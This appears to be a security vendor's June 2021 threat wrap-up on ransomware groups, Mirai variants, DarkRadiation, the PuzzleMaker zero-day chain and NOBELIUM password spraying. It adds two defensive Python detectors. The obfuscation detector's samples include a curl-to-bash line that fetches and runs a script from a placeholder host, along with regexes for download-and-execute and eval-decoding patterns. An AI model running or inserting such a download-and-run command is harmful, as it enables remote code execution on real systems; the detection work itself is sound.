June 2021 saw a number of ransomware attacks and ransom payments. Gold Northfield, the REvil ransomware group, launched various attacks against high-profile targets. JBS Foods, one of the world’s largest meat producers, paid the equivalent of $11 million to restore its operations in Australia, the USA, and Canada after being infected by REvil. Fujifilm also fell victim to a ransomware attack by the REvil threat actors using the Qbot Trojan, as did Brazilian healthcare giant Grupo Fleury. The demand was $5 million for a way to decrypt its data and an assurance that no stolen data would be leaked.
The popularity of REvil also has a shadow side for Gold Northfield: threat actors have started pirating ransomware to save time and resources. A tweaked version of the notorious REvil ransomware, dubbed LV ransomware, was detected in June. This new variant tracked and infected Windows machines with malicious binaries. The threat actors behind LV quite likely used a hex editor to remove potentially identifying characteristics from the binaries. Given the hard-coded 2.02 version value alongside code unique to REvil 2.03, it looks like a beta version of REvil 2.03 was pirated for the LV ransomware. The malware linked to Tor-based ransom payment sites, and each LV ransomware variant was unique, effectively preventing file decryption across multiple victims. It can be expected that the threat actors will market their LV ransomware as a RaaS.
In a previous monthly wrap-up, we mentioned that two prominent Russian-speaking cybercrime forums banned posts on ransomware-related topics. This forced threat actors to promote their services in other ways. In June, we noticed that at least two ransomware gangs (LockBit and Himalaya), looking to recruit hackers, started using their own websites to advertise their encryption tools and attract new affiliates. The Himalaya ransomware group offered affiliates a 70% commission and advertised its configured and compiled FUD (Fully UnDetectable) file-encrypting malware.
We also saw new variants of the notorious Mirai IoT malware hit the streets. The original source code was released to the general public in 2016, and it did not take long for threat actors to seize the opportunity to create their own versions with the same structure and goal as the original. The Mirai IoT malware finds IoT devices that use default or weak usernames and passwords. After gaining access by exploiting known and zero-day vulnerabilities, the malware downloads and executes malicious binaries, turning the infected device into part of a zombie network (botnet) used for Distributed Denial-of-Service (DDoS) attacks. The latest variants use unique strings or tokens in their binaries to verify whether, for example, SSH or Telnet commands were successfully executed on the device.
The newly discovered Bash ransomware became active in June, using a fully implemented bash script in its attack chain. Mainly Red Hat and CentOS Linux distributions appear to have been targeted. The worm and ransomware scripts also used the API of a popular messaging app for C&C communications. The api_attack directory contained various versions of the Bash ransomware, aka DarkRadiation, as well as the SSH worm responsible for spreading the ransomware. The scripts were obfuscated with the open-source node-bash-obfuscate tool, a Node.js CLI tool and library for obfuscating bash scripts. The malware also checked whether its configuration allowed SSH password/key-based attacks; SSH passwords and SSH keys were then tested against the targeted IP address. Once a connection was established, the Bash malware downloaded and executed the ransomware on the compromised system, using an install_tools function to install the necessary tooling. The messaging app’s API was also used to update the threat actors about the infection status.
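As an added illustration of what a defender can do with the obfuscation and download-and-execute behaviour described above (this is example code written for this wrap-up, not code from the page, from Cymulate's platform, or from the DarkRadiation analysis), the following Python script scores a shell script on generic obfuscation indicators: `eval` of decoded data, `base64 -d`, hex escapes, and a curl/wget-to-shell pipeline. The three sample scripts are constructed for the demonstration, and the indicator set and verdict thresholds are assumptions of mine; they are not a signature of node-bash-obfuscate output.

```python
import math
import re
from collections import Counter

# Constructed sample scripts for the demonstration. None of them is real malware;
# the "obfuscated" one only imitates the generic eval/base64/hex-escape patterns that
# script obfuscators tend to leave behind.
PLAIN_SCRIPT = """#!/bin/bash
set -e
yum install -y openssl curl
echo "install done"
"""

OBFUSCATED_SCRIPT = """#!/bin/bash
_a='ZWNobyAiaGVsbG8i'
_b=$(printf '%s' "$_a" | base64 -d)
eval "$_b"
eval "$(printf '\\x65\\x63\\x68\\x6f hi')"
"""

# Placeholder documentation address (RFC 5737), not an indicator from the page.
DOWNLOADER_SCRIPT = """#!/bin/bash
curl -s http://203.0.113.10/setup.sh | bash
"""

# Assumed indicator set: each pattern is counted over the whole script text.
INDICATORS = {
    "eval": re.compile(r"\beval\b"),
    "base64_decode": re.compile(r"base64\s+(?:-d|--decode)\b"),
    "hex_escape": re.compile(r"\\x[0-9a-fA-F]{2}"),
    "download_exec": re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b"),
}


def shannon_entropy(text):
    """Bits per character; encoded payloads push this up, so analysts can threshold it."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def assess(script_text):
    """Return (verdict, indicator counts) for one script.

    Verdict rules are assumptions for the example:
    - eval combined with any decoding step   -> likely-obfuscated
    - curl/wget piped into a shell           -> downloader
    - eval or decoding alone                 -> review
    - nothing matched                        -> plain
    """
    counts = {name: len(rx.findall(script_text)) for name, rx in INDICATORS.items()}
    counts["entropy"] = round(shannon_entropy(script_text), 2)
    decoding = counts["base64_decode"] + counts["hex_escape"]
    if counts["eval"] and decoding:
        verdict = "likely-obfuscated"
    elif counts["download_exec"]:
        verdict = "downloader"
    elif counts["eval"] or decoding:
        verdict = "review"
    else:
        verdict = "plain"
    return verdict, counts


if __name__ == "__main__":
    for name, body in (("plain", PLAIN_SCRIPT),
                       ("obfuscated", OBFUSCATED_SCRIPT),
                       ("downloader", DOWNLOADER_SCRIPT)):
        verdict, counts = assess(body)
        print(f"{name:>10}: {verdict:<18} {counts}")
```

In practice the counts would be fed into a file-integrity or EDR pipeline that runs over newly written shell scripts in cron, systemd unit and user home directories; the entropy figure is reported rather than thresholded here because a sensible cut-off depends on the typical scripts in your own environment.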
Over the last few months, multiple companies were attacked by a group of threat actors, dubbed PuzzleMaker, who exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. The chain allowed remote attackers to execute arbitrary code inside the browser sandbox via a crafted HTML page and then escape to the main system. By chaining the CVE-2021-31955 and CVE-2021-31956 vulnerabilities, the attackers were able to execute their malicious code on the targeted machine as follows:
- The stager verified that the exploit was successful.
- Once successful, the stager retrieved the dropper from the C&C server.
- The dropper, which contained the Remote Shell feature, was executed.
- The stager and dropper started impersonating legitimate Windows files on the targeted machine.
- The payload was used to download and extract files/create system processes.
- The malware could also temporarily put itself to “sleep” or self-destruct.
We end this wrap-up with an update about the state-sponsored hacking group NOBELIUM (aka APT29, Cozy Bear, and The Dukes). These threat actors, responsible for the SolarWinds supply-chain attacks, conducted password spray and brute-force attacks in June to gain access to corporate networks via Microsoft customer support tools.
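Two of the items above come down to the same authentication-log question: the Mirai variants hunt for devices that accept default or weak credentials, and NOBELIUM used password spraying and brute force against customer-support tooling. The following Python script is an added example (not code from the page, from Cymulate, or from any vendor's detection content) that separates the two patterns in failed-login records: a brute-force source hammers one account many times, while a spraying source touches many accounts once or twice each. The log lines are constructed sshd-style records using RFC 5737 documentation addresses, and the thresholds and the factory-default account watchlist are assumptions; the same grouping logic applies to any authentication source once the parser is swapped.

```python
import re
from collections import defaultdict

# Constructed sshd-style auth log for the demonstration; not real data.
SAMPLE_LOG = """\
Jun 12 03:14:01 edge sshd[2211]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jun 12 03:14:02 edge sshd[2213]: Failed password for root from 203.0.113.7 port 51023 ssh2
Jun 12 03:14:03 edge sshd[2215]: Failed password for root from 203.0.113.7 port 51024 ssh2
Jun 12 03:14:04 edge sshd[2217]: Failed password for root from 203.0.113.7 port 51025 ssh2
Jun 12 03:14:05 edge sshd[2219]: Failed password for root from 203.0.113.7 port 51026 ssh2
Jun 12 03:14:06 edge sshd[2221]: Failed password for root from 203.0.113.7 port 51027 ssh2
Jun 12 03:20:10 edge sshd[2301]: Failed password for invalid user admin from 198.51.100.9 port 40001 ssh2
Jun 12 03:20:11 edge sshd[2303]: Failed password for invalid user support from 198.51.100.9 port 40002 ssh2
Jun 12 03:20:12 edge sshd[2305]: Failed password for invalid user user from 198.51.100.9 port 40003 ssh2
Jun 12 03:20:13 edge sshd[2307]: Failed password for invalid user pi from 198.51.100.9 port 40004 ssh2
Jun 12 03:20:14 edge sshd[2309]: Failed password for invalid user guest from 198.51.100.9 port 40005 ssh2
Jun 12 03:25:00 edge sshd[2401]: Failed password for alice from 192.0.2.5 port 50100 ssh2
Jun 12 03:25:20 edge sshd[2403]: Failed password for alice from 192.0.2.5 port 50101 ssh2
Jun 12 03:25:30 edge sshd[2405]: Accepted password for alice from 192.0.2.5 port 50102 ssh2
"""

FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

# Assumed watchlist of account names that commonly ship as factory defaults on IoT gear.
DEFAULT_ACCOUNTS = {"root", "admin", "user", "pi", "support", "guest", "default"}


def parse_failures(log_text):
    """Return a list of (source_ip, username) for every failed-password line."""
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            events.append((m.group("src"), m.group("user")))
    return events


def classify_sources(events, brute_threshold=5, spray_min_users=4, spray_max_per_user=2):
    """Label each source IP as brute-force, password-spray or below-threshold.

    brute-force:    at least brute_threshold failures against a single account
    password-spray: at least spray_min_users distinct accounts, none tried more than
                    spray_max_per_user times (the low-and-slow pattern that per-account
                    lockout policies do not catch)
    Thresholds are assumptions for the example and should be tuned per environment.
    """
    per_src = defaultdict(lambda: defaultdict(int))
    for src, user in events:
        per_src[src][user] += 1
    verdicts = {}
    for src, users in per_src.items():
        max_per_user = max(users.values())
        if max_per_user >= brute_threshold:
            verdicts[src] = "brute-force"
        elif len(users) >= spray_min_users and max_per_user <= spray_max_per_user:
            verdicts[src] = "password-spray"
        else:
            verdicts[src] = "below-threshold"
    return verdicts


def default_account_hits(events):
    """Count failures per source that targeted a factory-default account name."""
    hits = defaultdict(int)
    for src, user in events:
        if user in DEFAULT_ACCOUNTS:
            hits[src] += 1
    return dict(hits)


if __name__ == "__main__":
    events = parse_failures(SAMPLE_LOG)
    for src, verdict in classify_sources(events).items():
        print(f"{src:<15} {verdict}")
    print("default-account attempts:", default_account_hits(events))
```

The spray rule deliberately keys on source IP rather than on account, because the usual per-account lockout counter never trips when each account sees only one or two attempts; aggregating by source (or, for cloud sign-in logs, by source and user agent) is what surfaces the pattern.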
To find out whether your organization is protected against the latest malware attacks, run Cymulate’s Immediate Threats assessment. This lets you test and verify for yourself whether your organization is exposed to these attacks, and it offers mitigation suggestions if your organization turns out to be vulnerable. IoCs are also available in the Cymulate UI.